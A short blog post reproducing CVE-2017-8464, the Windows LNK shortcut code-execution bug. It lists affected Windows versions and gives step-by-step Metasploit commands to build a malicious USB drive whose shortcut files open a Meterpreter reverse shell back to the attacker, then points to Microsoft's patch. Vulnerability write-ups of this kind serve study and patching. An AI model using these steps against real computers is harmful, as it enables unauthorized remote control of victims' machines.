首页 » NetworkSec » AWD » 正文

stuxnet repeat(cve-2017-8464)

0x01 Overview

In June 2017,Microsoft posted a patch for cve-2017-8464,this bug allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut. aka “LNK Remote Code Execution Vulnerability.”.

It like stuxnet,so some people call it the three generations of stuxnet.In this article,I will repeat cve-2017-8464.

0x02 The effects of range

Windows 7 SP1

Windows 8

Windows 8.1

Windows RT 8.1

Windows 10 Gold, 1511, 1607, 1703

Windows Server 2008 SP2 and R2 SP1

Windows Server 2012 Gold and R2

Windows Server 2016

0x03 Trigger conditions

1.Open automatically play(It worked!)

2.Browse the catalog(It worked!

3.Access the file directory through a network share(I did not test this)

0x04 Bug repeat

Environment:

Drone: win7(32bit)

Attacker: kali

Tools: MSF,u disk

Step 1:

Download the last metasploit,then copy modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb to /usr/share/metasploit-framework/modules/exploits/windows/fileformat.

And copy data/exploits/cve-2017-8464 to /usr/share/metasploit-framework/data/exploits.

Step 2:

msfconsole

use exploit/windows/fileformat/cve_2017_8464_lnk_rce

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST your ip

exploit

Step 3:
cp /root/.msf4/local/ /root/cve-2017-8464-lnk

Step 4:
cp the all 24 files to the root folder of the target USB drive

Step 5:
use multi/handler

set paylaod windows/meterpreter/reverse_tcp

set LHOST your ip

run

Step 6:
insert your usb to target computer,then you will get a reverse shell.

PS: the .cpl file must in  the root folder of the target USB drive!

0x05 Repair

Get the patch from MS:

https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8464

0x06 Conclusion

I think this bug is so cool,it like stuxnet,powful and easy to use,so get the patch as fast as possible.

0x07 Reference

1.https://cve.mitre.org/data/downloads/allitems-cvrf-year-2017.xml

2.http://www.4hou.com/system/6938.html

3.http://www.freebuf.com/news/143356.html

 

Comment